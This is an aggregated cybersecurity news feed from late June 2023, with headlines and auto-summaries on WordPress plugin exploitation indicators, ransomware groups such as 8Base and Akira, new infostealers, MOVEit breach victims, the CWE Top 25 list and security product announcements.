                Autosummary: WordPress sites hacked using CVE-2023-3460 in these attacks will show the following indicators: appearance of new administrator accounts on the website; usage of the usernames wpenginer, wpadmins, wpengine_backup, se_brutal, or segs_brutal; log records showing that IPs known to be malicious accessed the Ultimate Member registration page; log records showing access from 146.70.189.245, 103.187.5.128, 103.30.11.160, 103.30.11.146, and 172.70.147.176; appearance of a user account with an email address associated with "exelica.com"; and installation of new WordPress plugins and themes on the site. Because the critical flaw remains unpatched and is so easy to exploit, Wordfence recommends the Ultimate Member plugin be uninstalled immediately.


                The Week in Ransomware - June 30th 2023 - Mistaken Identity

                exploits ransomware
                2023-06-30 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-june-30th-2023-mistaken-identity/
                A case of mistaken identity and further MOVEit Transfer data breaches continued to dominate the ransomware news cycle this week. [...]

                Autosummary: Contributors and those who provided new ransomware information and stories this week include: @BleepinComputer, @fwosar, @demonslay335, @billtoulas, @Seifreed, @LawrenceAbrams, @malwrhunterteam, @struppigel, @serghei, @rivitna2, @Avast, @AuCyble, @VMware, @pcrisk, @BushidoToken, and @BrettCallow.


                "Free" Evil Dead Rise movie scam lurks in Amazon listings

                financial
                2023-06-30 https://www.malwarebytes.com/blog/news/2023/06/free-evil-dead-rise-movie-scam-lurks-in-amazon-listings

                Categories: Personal

                Tags: evil dead

                Tags: evil dead rise

                Tags: fake

                Tags: scam

                Tags: podcast

                Tags: movie

                Tags: download

                Tags: stream

                Tags: audible

                Tags: amazon music

                Tags: bruce Campbell

                Tags: sam raimi

                Tags: lily Sullivan

                Tags: Alyssa Sutherland

                Tags: lee Cronin

                Tags: chainsaw

                We take a look at a bogus Amazon podcast listing which promises free streams of Evil Dead Rise.


                The post "Free" Evil Dead Rise movie scam lurks in Amazon listings appeared first on Malwarebytes Labs.


                Autosummary: In testing, we saw a program claiming to offer all manner of media downloads. In another test, we were directed to an odd payment page. I say odd, because the URL contains the word “antivirus”, which would suggest you’re potentially signing up for a security service of some kind. I don’t know, but the page says this at the top: “This is a special offer for a limited period of 3 days which comes with a £13.00 welcome gift card to explore and buy products in one of our affiliates’ websites.” Evil Dead Rise, the breakout horror film of 2023, started with big cinema numbers and has moved on to a victory lap in streaming land for good measure.


                Councillors quitting over in-person meetings

                government
                2023-06-29 https://www.bbc.co.uk/news/uk-politics-65996576?at_medium=RSS&at_campaign=KARANGA
                Councils say not allowing meetings that include virtual attendance makes it harder for parents and disabled people.



                Smashing Security podcast #328: UPS smishing, ChatGPT 101, and storing secret files

                financial
                2023-06-29 https://grahamcluley.com/smashing-security-podcast-328/
                UPS delivers some smishing advice (but have they kept something under wraps?), we ask ChatGPT to take a long hard look at itself, and we debate what the penalty should be for taking national secrets home with you. All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by cybersecurity veterans Graham Cluley and Carole Theriault, joined this week by Host Unknown’s sole founder Thom Langford.

                Autosummary: Hosts: Graham Cluley (@gcluley) and Carole Theriault (@caroletheriault). Guest: Thom Langford (@ThomLangford). Sponsored by Bitwarden.


                Newly Uncovered ThirdEye Windows-Based Malware Steals Sensitive Data

                exploits
                2023-06-29 https://thehackernews.com/2023/06/newly-uncovered-thirdeye-windows-based.html
                A previously undocumented Windows-based information stealer called ThirdEye has been discovered in the wild with capabilities to harvest sensitive data from infected hosts. Fortinet FortiGuard Labs, which made the discovery, said it found the malware in an executable that masqueraded as a PDF file with a Russian name "CMK Правила оформления больничных листов.pdf.exe," which translates to "CMK

                Autosummary: The evolving stealer, like other malware families of its kind, is equipped to gather system metadata, including BIOS release date and vendor, total/free disk space on the C drive, currently running processes, registered usernames, and volume information.


                Experts published PoC exploits for Arcserve UDP authentication bypass issue

                exploits
                2023-06-29 https://securityaffairs.com/147940/hacking/poc-exploits-arcserve-udp-auth-bypass.html

                Data protection firm Arcserve addressed an authentication bypass vulnerability in its Unified Data Protection (UDP) backup software. Data protection vendor Arcserve addressed a high-severity authentication bypass flaw, tracked as CVE-2023-26258, in its Unified Data Protection (UDP) backup software. Threat actors can exploit the vulnerability to bypass authentication and gain admin privileges. Arcserve Unified Data Protection […]

                The post Experts published PoC exploits for Arcserve UDP authentication bypass issue appeared first on Security Affairs.




                Microsoft fixes bug that breaks Windows Start Menu, UWP apps

                exploits
                2023-06-29 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-that-breaks-windows-start-menu-uwp-apps/
                Microsoft has addressed a bug causing Windows Search and the Start Menu to become unresponsive and some Windows applications to no longer open. [...]

                Autosummary: "To mitigate this issue, you can uninstall apps which integrate with Windows, Microsoft Office, Microsoft Outlook or Outlook Calendar," Redmond says.


                Trellix fixes bug breaking Office apps after June Windows updates

                exploits
                2023-06-29 https://www.bleepingcomputer.com/news/software/trellix-fixes-bug-breaking-office-apps-after-june-windows-updates/
                Cybersecurity firm Trellix has addressed an incompatibility issue causing Endpoint Security Agent's Exploit Guard module to block some Microsoft Office and third-party apps from opening after installing June 2023 cumulative updates. [...]

                Autosummary: Chrome process running in the background (BleepingComputer). While Trellix, Malwarebytes, and WatchGuard have now addressed this known issue, Cisco customers are advised to turn off anti-exploit protection in their security software's settings or configure Google Chrome as the default web browser through the system's Settings menu until a fix is available.


                North Korean Hacker Group Andariel Strikes with New EarlyRat Malware

                exploits
                2023-06-29 https://thehackernews.com/2023/06/north-korean-hacker-group-andariel.html
                The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year. "Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report. Also called Silent Chollima and Stonefly,

                Autosummary: "Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control (C2) server," Kaspersky said in a new report. "


                Android Spy App LetMeSpy Suffers Major Data Breach, Exposing Users' Personal Data

                financial
                2023-06-29 https://thehackernews.com/2023/06/android-spy-app-letmespy-suffers-major.html
                Android-based phone monitoring app LetMeSpy has disclosed a security breach that allowed an unauthorized third-party to steal sensitive data associated with thousands of Android users. "As a result of the attack, the criminals gained access to email addresses, telephone numbers and the content of messages collected on accounts," LetMeSpy said in an announcement on its website, noting the "



                MITRE releases new list of top 25 most dangerous software bugs

                exploits
                2023-06-29 https://www.bleepingcomputer.com/news/security/mitre-releases-new-list-of-top-25-most-dangerous-software-bugs/
                MITRE shared today this year's list of the top 25 most dangerous weaknesses plaguing software during the previous two years. [...] "

                Autosummary: Excerpt from the 2023 CWE Top 25 table (columns: rank, CWE ID, weakness name, score, CVEs in CISA's KEV catalog, rank change vs. 2022):
                13  CWE-287  Improper Authentication  6.39  10  +1
                14  CWE-190  Integer Overflow or Wraparound  5.89  4  -1
                15  CWE-502  Deserialization of Untrusted Data  5.56  14  -3
                16  CWE-77   Improper Neutralization of Special Elements used in a Command ("Command Injection")  4.95  4  +1
                17  CWE-119  Improper Restriction of Operations within the Bounds of a Memory Buffer  4.75  7  +2
                18  CWE-798  Use of Hard-coded Credentials  4.57  2  -3
                19  CWE-918  Server-Side Request Forgery (SSRF)  4.56  16  +2
                20  CWE-306  Missing Authentication for Critical Function  3.78  8  -2
                21  CWE-362  Concurrent Execution using Shared Resource with Improper Synchronization ("Race Condition")  3.53  8  +1
                22  CWE-269  Improper Privilege Management  3.31  5  +7
                23  CWE-94   Improper Control of Generation of Code ("Code Injection")  3.30  6  +2
                24  CWE-863  Incorrect Authorization  3.16  0  +4
                25  CWE-276  Incorrect Default Permissions  3.16  0  -5
                Warnings regarding software and hardware bugs: In a collaborative effort involving cybersecurity authorities worldwide, a comprehensive compilation of the top 15 vulnerabilities commonly exploited in attacks throughout 2021 was released in April 2022. "


                Criminal IP Unveils Bug Bounty Program to Boost User Safety, Security

                exploits
                2023-06-29 https://www.bleepingcomputer.com/news/security/criminal-ip-unveils-bug-bounty-program-to-boost-user-safety-security/
                OSINT-based CTI search engine Criminal IP has launched a bug bounty program aimed at strengthening the safety of its services and protecting its users. [...] "



                Over 1500 gas stations disrupted in Canada, after energy giant hacked

                industry
                2023-06-29 https://www.bitdefender.com/blog/hotforsecurity/over-1500-gas-stations-disrupted-in-canada-after-energy-giant-hacked/
                Suncor, one of the largest energy companies in North America, has suffered a cyber attack that left Canadian motorists unable to make gas station purchases with payment cards, and even disabled car washes. Read more in my article on the Hot for Security blog. "



                Fluhorse: Flutter-Based Android Malware Targets Credit Cards and 2FA Codes

                exploits
                2023-06-29 https://thehackernews.com/2023/06/fluhorse-flutter-based-android-malware.html
                Cybersecurity researchers have shared the inner workings of an Android malware family called Fluhorse. The malware "represents a significant shift as it incorporates the malicious components directly within the Flutter code," Fortinet FortiGuard Labs researcher Axelle Apvrille said in a report published last week. Fluhorse was first documented by Check Point in early May 2023, detailing its "



                Previously undetected ThirdEye malware appears in the threat landscape

                exploits
                2023-06-29 https://securityaffairs.com/147954/malware/thirdeye-infostealer.html

                A new Windows information stealer dubbed ThirdEye has appeared in the threat landscape; it has been active since April. Fortinet FortiGuard Labs discovered the previously undetected information stealer. The malicious code is not sophisticated, but it allows operators to steal various information from infected machines. Fortinet started investigating the threat after the discovery of an […]

                The post Previously undetected ThirdEye malware appears in the threat landscape appeared first on Security Affairs.

                "



                New EarlyRAT malware linked to North Korean Andariel hacking group

                exploits
                2023-06-29 https://www.bleepingcomputer.com/news/security/new-earlyrat-malware-linked-to-north-korean-andariel-hacking-group/
                Security analysts have discovered a previously undocumented remote access trojan (RAT) named "EarlyRAT," used by Andariel, a sub-group of the Lazarus North Korean state-sponsored hacking group. [...] "

                Autosummary: By exploiting the flaw in Log4j software, Andariel downloaded off-the-shelf tools like 3Proxy, Putty, Dumpert, and Powerline to perform network reconnaissance, credential stealing, and lateral movement. "


                The phone monitoring app LetMeSpy disclosed a data breach

                financial
                2023-06-29 https://securityaffairs.com/147968/data-breach/letmespy-disclosed-security-breach.html

                Android app LetMeSpy disclosed a security breach in which sensitive data associated with thousands of Android users was exposed. Threat actors stole data including messages, locations, call logs, e-mail addresses, and telephone numbers. According to a notice published by the company, the […]

                The post The phone monitoring app LetMeSpy disclosed a data breach appeared first on Security Affairs.

                "



                8Base Ransomware Spikes in Activity, Threatens U.S. and Brazilian Businesses

                exploits latam ransomware
                2023-06-28 https://thehackernews.com/2023/06/8base-ransomware-spikes-in-activity.html
                A ransomware threat called 8Base that has been operating under the radar for over a year has been attributed to a "massive spike in activity" in May and June 2023. "The group utilizes encryption paired with "name-and-shame" techniques to compel their victims to pay their ransoms," VMware Carbon Black researchers Deborah Snyder and Fae Carlisle said in a report shared with The Hacker News. "8Base "

                Autosummary: 8Base is part of a wave of ransomware newbies entering the market such as CryptNet, Xollam, and Mallox, even as known families like BlackCat, LockBit, and Trigona have witnessed continuous updates to their features and attack chains to broaden their horizons beyond Windows to infect Linux and macOS systems. "


                The Current State of Business Email Compromise Attacks

                government
                2023-06-28 https://www.bleepingcomputer.com/news/security/the-current-state-of-business-email-compromise-attacks/
                Business Email Compromise (BEC) poses a growing threat to businesses of all sizes. Learn more from Specops Software about the types of BEC attacks and how to avoid them. [...] "

                Autosummary: Recognizing a Business Email Compromise attack: Running a business is complex, and with so many moving parts, attackers can attempt different angles, targeting C-level executives, shipping departments, billing, or IT. To make the attack more effective, the threat actor may have researched their targets and attempted to match their language, terminology, style, and email address as closely as possible. But with proper education and vigilance on the part of employees, paired with a robust password policy such as one offered by Specops Password Policy, these attacks can be mitigated. "


                8Base ransomware gang escalates double extortion attacks in June

                exploits ransomware
                2023-06-28 https://www.bleepingcomputer.com/news/security/8base-ransomware-gang-escalates-double-extortion-attacks-in-june/
                The 8Base ransomware gang is targeting organizations worldwide in double-extortion attacks, with a steady stream of new victims since the beginning of June. [...] "

                Autosummary: (Figure: 8Base data leak site on the dark web. Source: BleepingComputer) Links to other ransomware groups: In a new report by VMware's Carbon Black team, the tactics seen in recent 8Base attacks point to them being a rebrand of a well-established ransomware organization, potentially RansomHouse. "


                8Base ransomware group leaks data of 67 victim organizations

                exploits ransomware
                2023-06-28 https://www.helpnetsecurity.com/2023/06/28/8base-ransomware/

                Lockbit 3.0 is currently the most active ransomware group, NCC Group says in its most recent Threat Pulse report, but new ransomware groups like 8Base and Akira are rising in prominence. Collectively, the various ransomware groups revealed 436 victim organizations in May 2023 – 24% more than in April 2023 (352), and 56% more than in May 2022. This considerable increase can be attributed, in part, to the 8Base ransomware group, which released data from … More

                The post 8Base ransomware group leaks data of 67 victim organizations appeared first on Help Net Security.

                "

                Autosummary: This considerable increase can be attributed, in part, to the 8Base ransomware group, which released data from 67 victims they breached between April 2022 and May 2023. About the 8Base ransomware group: According to VMware Carbon Black's Threat Analysis Unit (TAU), the group has been active since March 2022, but its activity has become more prominent now due to the significant number of data dumps released in May. "


                Bitdefender acquires Horangi Cyber Security to expand its unified risk and security analytics platform

                industry
                2023-06-28 https://www.helpnetsecurity.com/2023/06/28/bitdefender-horangi-cyber-security/

                Bitdefender has agreed to acquire Horangi Cyber Security to address the growing demand for advanced, streamlined management of cybersecurity, compliance, and governance of multi-cloud environments. As organizations continue to accelerate cloud adoption, they struggle to manage the thousands of configuration settings and permissions, identities, and entitlements presented by multiple cloud providers. According to Gartner, “Misconfigured cloud resources continue to be a primary reason for cloud-related data breaches.” A single point of insight and control across … More

                The post Bitdefender acquires Horangi Cyber Security to expand its unified risk and security analytics platform appeared first on Help Net Security.

                "

                Autosummary: In a 2023 report, Gartner noted that “CSPM is commonly purchased as part of a cloud-native application protection platform (CNAPP) that includes broader cloud security capabilities such as cloud workload protection platform (CWPP), cloud infrastructure entitlement management (CIEM), Kubernetes security posture management (KSPM), cloud detection and response (CDR).” "


                CryptosLabs Scam Ring Targets French-Speaking Investors, Rakes in €480 Million

                financial
                2023-06-28 https://thehackernews.com/2023/06/cryptoslabs-scam-ring-targets-french.html
                Cybersecurity researchers have exposed the workings of a scam ring called CryptosLabs that's estimated to have made €480 million in illegal profits by targeting French-speaking individuals in France, Belgium, and Luxembourg since April 2018. The syndicate's massive fake investment schemes primarily involve impersonating 40 well-known banks, fin-techs, asset management firms, and crypto "

                Autosummary: "CryptoLabs made their scam schemes more convincing through region-focused tactics, such as hiring French-speaking callers as "managers" and creating fake landing pages, social media ads, documents, and investment platforms in the French language," Anton Ushakov, deputy head of Group-IB's high-tech crime investigation department in Amsterdam, said. "


                Experts warn of a spike in May and June of 8Base ransomware attacks

                exploits ransomware
                2023-06-28 https://securityaffairs.com/147922/cyber-crime/8base-ransomware-attacks.html

                Researchers warn of a massive spike in May and June 2023 in activity associated with the ransomware group 8Base. VMware Carbon Black researchers observed an intensification of the activity of this stealthy ransomware group, with the spike occurring between May and June 2023. […]

                The post Experts warn of a spike in May and June of 8Base ransomware attacks appeared first on Security Affairs.

                "



                Linux version of Akira ransomware targets VMware ESXi servers

                exploits ransomware
                2023-06-28 https://www.bleepingcomputer.com/news/security/linux-version-of-akira-ransomware-targets-vmware-esxi-servers/
                The Akira ransomware operation uses a Linux encryptor to encrypt VMware ESXi virtual machines in double-extortion attacks against companies worldwide. [...] "

                Autosummary: (Figure: Files encrypted by Akira on a Linux server. Source: BleepingComputer) When encrypting files, the Linux Akira encryptor targets the following extensions: .4dd, .accdb, .accdc, .accde, .accdr, .accdt, .accft, .adb, .ade, .adf, .adp, .arc, .ora, .alf, .ask, .btr, .bdf, .cat, .cdb, .ckp, .cma, .cpd, .dacpac, .dad, .dadiagrams, .daschema, .db-shm, .db-wa, .db3, .dbc, .dbf, .dbs, .dbt, .dbv, .dbx, .dcb, .dct, .dcx, .dlis, .dp1, .dqy, .dsk, .dsn, .dtsx, .eco, .ecx, .edb, .epim, .exb, .fcd, .fdb, .fic, .fmp, .fmp12, .fmps, .fp3, .fp4, .fp5, .fp7, .fpt, .frm, .gdb, .grdb, .gwi, .hdb, .his, .idb, .ihx, .itdb, .itw, .jet, .jtx, .kdb, .kexi, .kexic, .kexis, .lgc, .lwx, .maf, .maq, .mar, .mas, .mav, .mdb, .mdf, .mpd, .mrg, .mud, .mwb, .myd, .ndf, .nnt, .nrmlib, .ns2, .ns3, .ns4, .nsf, .nv2, .nwdb, .nyf, .odb, .oqy, .orx, .owc, .p96, .p97, .pan, .pdb, .pdm, .pnz, .qry, .qvd, .rbf, .rctd, .rod, .rodx, .rpd, .rsd, .sas7bdat, .sbf, .scx, .sdb, .sdc, .sdf, .sis, .spq, .sqlite, .sqlite3, .sqlitedb, .temx, .tmd, .tps, .trc, .trm, .udb, .usr, .v12, .vis, .vpd, .vvv, .wdb, .wmdb, .wrk, .xdb, .xld, .xmlff, .abcddb, .abs, .abx, .accdw, .adn, .db2, .fm5, .hjt, .icg, .icr, .lut, .maw, .mdn, .mdt, .vdi, .vhd, .vmdk, .pvm, .vmem, .vmsn, .vmsd, .nvram, .vmx, .raw, .qcow2, .subvo, .bin, .vsv, .avhd, .vmrs, .vhdx, .avdx, .vmcx, .iso "


                Microsoft fixes Windows bug causing File Explorer freezes

                exploits
                2023-06-28 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-windows-bug-causing-file-explorer-freezes/
                Microsoft has addressed a known issue causing File Explorer to freeze on Windows 11 and Windows Server systems after viewing a file's effective access permissions. [...] "

                Autosummary: When users of affected devices click the "View effective access" button under Properties > Advanced to check a shared file's or folder's effective permissions, they may see a message stating "Computing effective access...." without the query results ever being displayed. "


                Exploit released for new Arcserve UDP auth bypass vulnerability

                exploits
                2023-06-28 https://www.bleepingcomputer.com/news/security/exploit-released-for-new-arcserve-udp-auth-bypass-vulnerability/
                Data protection vendor Arcserve has addressed a high-severity security flaw in its Unified Data Protection (UDP) backup software that can let attackers bypass authentication and gain admin privileges. [...] "



                Political hackers strike City of Fort Worth, in protest at anti-trans legislation

                government
                2023-06-27 https://www.bitdefender.com/blog/hotforsecurity/political-hackers-strike-city-of-fort-worth-in-protest-at-anti-trans-legislation/
                The city of Fort Worth in Texas announced on Saturday that it had suffered a security breach that saw hackers claim to have gained unauthorised access to data. But it doesn't appear, for now at least, that the hackers are attempting to extort a ransom from the city... Read more in my article on the Hot for Security blog. "



                New Fortinet's FortiNAC Vulnerability Exposes Networks to Code Execution Attacks

                exploits
                2023-06-27 https://thehackernews.com/2023/06/new-fortinets-fortinac-vulnerability.html
                Fortinet has rolled out updates to address a critical security vulnerability impacting its FortiNAC network access control solution that could lead to the execution of arbitrary code. Tracked as CVE-2023-33299, the flaw is rated 9.6 out of 10 for severity on the CVSS scoring system. It has been described as a case of Java untrusted object deserialization. "A deserialization of untrusted data "

                Autosummary: The shortcoming impacts the following products, with patches available in FortiNAC versions 7.2.2, 9.1.10, 9.2.8, and 9.4.3 or later:
                - FortiNAC version 9.4.0 through 9.4.2
                - FortiNAC version 9.2.0 through 9.2.7
                - FortiNAC version 9.1.0 through 9.1.9
                - FortiNAC version 7.2.0 through 7.2.1
                - FortiNAC 8.8 all versions
                - FortiNAC 8.7 all versions
                - FortiNAC 8.6 all versions
                - FortiNAC 8.5 all versions
                - FortiNAC 8.3 all versions
                Also resolved by Fortinet is a medium-severity vulnerability tracked as CVE-2023-33300 (CVSS score: 4.8), an improper access control issue affecting FortiNAC 9.4.0 through 9.4.3 and FortiNAC 7.2.0 through 7.2.1. "


                AI cuts treatment time for cancer radiotherapy

                financial industry
                2023-06-27 https://www.bbc.co.uk/news/health-65988768?at_medium=RSS&at_campaign=KARANGA
                The technology will be offered at cost price to all NHS trusts in England, following successful pilot studies. "



                Beyond Asset Discovery: How Attack Surface Management Prioritizes Vulnerability Remediation

                exploits
                2023-06-27 https://thehackernews.com/2023/06/beyond-asset-discovery-how-attack.html
                As the business environment becomes increasingly connected, organizations’ attack surfaces continue to expand, making it challenging to map and secure both known and unknown assets. In particular, unknown assets present security challenges related to shadow IT, misconfigurations, ineffective scan coverage, among others. Given attack surface sprawl and evolving threats, many organizations are "

                Autosummary: Its global cybersecurity experts are committed to securing the world's most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading global cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India. "


                Anatsa Banking Trojan Targeting Users in US, UK, Germany, Austria, and Switzerland

                financial exploits
                2023-06-27 https://thehackernews.com/2023/06/anatsa-banking-trojan-targeting-users.html
                A new Android malware campaign has been observed pushing the Anatsa banking trojan to target banking customers in the U.S., U.K., Germany, Austria, and Switzerland since the start of March 2023. "The actors behind Anatsa aim to steal credentials used to authorize customers in mobile banking applications and perform Device-Takeover Fraud (DTO) to initiate fraudulent transactions," ThreatFabric "

                Autosummary: The list of top countries that are of interest to Anatsa based on the number of financial applications targeted include the U.S., Italy, Germany, the U.K., France, the U.A.E., Switzerland, South Korea, Australia, and Sweden. "


                Schneider Electric and Siemens Energy are two more victims of a MOVEit attack

                industry
                2023-06-27 https://securityaffairs.com/147865/data-breach/schneider-electric-siemens-energy-moveit.html

                The Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial giants Schneider Electric and Siemens Energy. Both Schneider Electric and Siemens Energy provide […]

                The post Schneider Electric and Siemens Energy are two more victims of a MOVEit attack appeared first on Security Affairs.

                "

                Autosummary: Below is the list of victims added to the group's leak site:
                - werum.com
                - Schneider Electric (http://se.com)
                - Siemens Energy (http://siemens-energy.com)
                - UCLA (http://ucla.edu)
                - AbbVie (http://abbvie.com)
                For the uninitiated, Schneider Electric and Siemens Energy are two more notable victims as they are very large Industrial Control System (ICS) vendors. "


                Index Engines CyberSense 8.3 identifies malicious changes indicative of cyberattack

                ciber
                2023-06-27 https://www.helpnetsecurity.com/2023/06/27/index-engines-cybersense-8-3/

                Index Engines announced CyberSense 8.3, which features several user experience updates highlighted by additional metrics after a ransomware attack is detected, a new setup wizard and system configuration interface. CyberSense scans backup data and snapshots to validate their integrity and identify malicious changes indicative of cyberattack. When an attack occurs, CyberSense provides forensic reporting to diagnose and recover to normal business operations. CyberSense’s user interface displays rich details on every attack, including the nature of … More

                The post Index Engines CyberSense 8.3 identifies malicious changes indicative of cyberattack appeared first on Help Net Security.

                "



                Delinea Privilege Manager enhancements reduce phishing effectiveness

                financial
                2023-06-27 https://www.helpnetsecurity.com/2023/06/27/delinea-privilege-manager-enhancements/

                Delinea announced the latest release of Privilege Manager, its solution for providing privilege elevation controls for users and applications on workstations. The latest enhancements significantly improve ease of use for customers by preconfiguring five of the most common privilege elevation policies through the Workstation Policy Framework to simplify implementation and accelerate time to value. The 2023 Verizon Data Breach Investigations Report found that phishing makes up 44% of all social engineering incidents. According to the … More

                The post Delinea Privilege Manager enhancements reduce phishing effectiveness appeared first on Help Net Security.

                "

                Autosummary: “Our mission is to make security seamless and with this release of Privilege Manager, which leverages customer feedback, users can enjoy easier policy management, better security, and less friction for an accelerated time to value of our solution.” "


                LexisNexis RiskNarrative helps organizations reduce risk and financial crime

                financial
                2023-06-27 https://www.helpnetsecurity.com/2023/06/27/lexisnexis-risknarrative/

                LexisNexis Risk Solutions has launched an end-to-end customer lifecycle management platform to help businesses effortlessly integrate multiple information sources to make better risk decisions and provide smoother customer journeys. LexisNexis RiskNarrative leverages automation and decisioning technology to provide a sophisticated, configurable and accessible financial crime lifecycle management solution. The growth of technology and digital platforms is changing how customers interact with businesses. Customers return to businesses expecting to be instantly recognized across multiple channels while … More

                The post LexisNexis RiskNarrative helps organizations reduce risk and financial crime appeared first on Help Net Security.

                "

                Autosummary: Organizations can expedite risk decisions through this more holistic view that incorporates Know Your Customer (KYC), Know Your Business (KYB), Anti-Money Laundering (AML) activity, identity documentation, behavioral biometrics and enhanced fraud detection. "


                New Mockingjay Process Injection Technique Could Let Malware Evade Detection

                exploits
                2023-06-27 https://thehackernews.com/2023/06/new-mockingjay-process-injection.html
                A new process injection technique dubbed Mockingjay could be exploited by threat actors to bypass security solutions to execute malicious code on compromised systems. "The injection is executed without space allocation, setting permissions or even starting a thread," Security Joes researchers Thiago Peixoto, Felipe Duarte, and Ido Naor said in a report shared with The Hacker News. "The "

                Autosummary: Some of the well-known process injection techniques include dynamic link library (DLL) injection, portable executable injection, thread execution hijacking, process hollowing, and process doppelgänging, among others. "


                Siemens Energy confirms data breach after MOVEit data-theft attack

                financial industry
                2023-06-27 https://www.bleepingcomputer.com/news/security/siemens-energy-confirms-data-breach-after-moveit-data-theft-attack/
                Siemens Energy has confirmed that data was stolen during the recent Clop ransomware data-theft attacks using a zero-day vulnerability in the MOVEit Transfer platform. [...] "

                Autosummary: It designs, develops, and manufactures a wide range of industrial products, including industrial control systems (ICS), state-of-the-art power, heat generation units, renewable energy systems, on and off-site energy delivery systems, and flexible power transmission solutions. "


                Understanding ransomware reinfection: An MDR case study

                exploits ransomware
                2023-06-27 https://www.malwarebytes.com/blog/business/2023/06/understanding-ransomware-reinfection-an-mdr-case-study

                Categories: Business

                Ransomware is like that stubborn cold that you thought you kicked, but creeps back up determined to run amok again.


                The post Understanding ransomware reinfection: An MDR case study appeared first on Malwarebytes Labs.

                "

                Autosummary: As part of our response, we raised a critical incident to the customer, carried out an extensive threat hunt, and identified two compromised domain admin accounts, a domain controller (DC), and an SQL server. Lessons from the incident: This episode underscores the relentless threat of ransomware reinfection in today's threat landscape, as well as the critical role that 24x7x365 diligence of trained cybersecurity experts, swift responses, and collaborative efforts play in cyber defense. "


                81% concerned about ChatGPT security and safety risks, Malwarebytes survey shows

                exploits
                2023-06-27 https://www.malwarebytes.com/blog/news/2023/06/chatgpt

                Categories: News

                ChatGPT may have already hit its public perception wall, according to a Malwarebytes survey that showed high levels of distrust and concern in the tool's trustworthiness and safety.


                The post 81% concerned about ChatGPT security and safety risks, Malwarebytes survey shows appeared first on Malwarebytes Labs.

                "

                Autosummary: (Figures: responses to "I trust the information produced by ChatGPT", "The information produced by ChatGPT is accurate", and "ChatGPT and other AI tools will improve internet safety" by respondents familiar with ChatGPT.) A risk to security and safety: Not only was ChatGPT seen as untrustworthy, it was also perceived as a negative influence on safety and security, with few seeing it as a tool that will improve safety, and an overwhelming majority seeing it as a source of risk. The responses were similarly bleak for the statement "I trust the information produced by ChatGPT," with only 10% agreeing and a huge 63% disagreeing. Despite all the hype and hoopla surrounding it, only 35% of our tech-savvy respondents agreed with the statement "I am familiar with ChatGPT," significantly less than the 50% that disagreed. Worse still, an extraordinary 81% were concerned about the possible security and/or safety risks. "


                5 free online cybersecurity courses you should check out

                ciber
                2023-06-26 https://www.helpnetsecurity.com/2023/06/26/free-online-cybersecurity-courses/

                Cryptography: In this course, you'll learn how to protect information to ensure its integrity, confidentiality, authenticity, and non-repudiation. You will develop a basic understanding of cryptographic concepts and how to apply them, implement secure protocols, key management concepts, critical administration and validation, and Public Key Infrastructure. Networks and Communications Security: In this course, you will learn about the network structure, data transmission methods, transport formats, and the security measures used to maintain integrity, availability, authentication, … More

                The post 5 free online cybersecurity courses you should check out appeared first on Help Net Security.

                "

                Autosummary: Networks and Communications Security: In this course, you will learn about the network structure, data transmission methods, transport formats, and the security measures used to maintain integrity, availability, authentication, and confidentiality of the information being transmitted. Cryptography: In this course, you'll learn how to protect information to ensure its integrity, confidentiality, authenticity, and non-repudiation. "


                Uncovering attacker tactics through cloud honeypots

                industry
                2023-06-26 https://www.helpnetsecurity.com/2023/06/26/cloud-environments-honeypots/

                Attackers typically find exposed “secrets” – pieces of sensitive information that allow access to an enterprise cloud environment – in as little as two minutes and, in many cases, begin exploiting them almost instantly, highlighting the urgent need for comprehensive cloud security, according to Orca Security. Orca’s research was conducted between January and May 2023, beginning with the creation of “honeypots” on nine different cloud environments that simulated misconfigured resources in the cloud to entice … More

                The post Uncovering attacker tactics through cloud honeypots appeared first on Help Net Security.

                Autosummary: No region is safe: Although 50% of all observed exposed AWS key usage took place in the United States, usage occurred in almost every other region as well, including Canada, APAC, Europe, and South America.


                Trojanized Super Mario Bros game spreads malware

                exploits
                2023-06-26 https://securityaffairs.com/147809/malware/trojanized-super-mario-bros-game.html

                Researchers observed threat actors spreading a trojanized Super Mario Bros game installer to deliver multiple malware. Researchers from Cyble Research and Intelligence Labs (CRIL) discovered a trojanized Super Mario Bros game installer for Windows that was used to deliver multiple malware, including an XMR miner, SupremeBot mining client, and the open-source Umbral stealer. The threat actors […]

                The post Trojanized Super Mario Bros game spreads malware appeared first on Security Affairs.

                Autosummary: The threat actors tampered with the NSIS installer file “Super-Mario-Bros.exe”; the resulting executable bundles three separate executables: “super-mario-forever-v702e.exe,” which is the legitimate Super Mario game application, along with the malicious executables named “java.exe” and “atom.exe,” as shown below.


                Exploring the persistent threat of cyberattacks on healthcare

                ciber
                2023-06-26 https://www.helpnetsecurity.com/2023/06/26/healthcare-institutions-cyberattacks/

                In this Help Net Security interview, Brett Harris, Cybersecurity Officer for the Americas at Siemens Healthineers, discusses the long-term impacts of cyberattacks on healthcare institutions and what healthcare providers can do to protect patients’ personal data and medical devices. Can you explain how the various hospital information systems (EHR, e-prescribing systems, practice management support systems, etc.) might be vulnerable to cyberattacks? Anything connected to a network is potentially vulnerable to cyberattacks, but the risk varies … More

                The post Exploring the persistent threat of cyberattacks on healthcare appeared first on Help Net Security.



                Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks

                industry
                2023-06-26 https://thehackernews.com/2023/06/chinese-hackers-using-never-before-seen.html
                The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest. The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda. "The adversary consistently employed ManageEngine

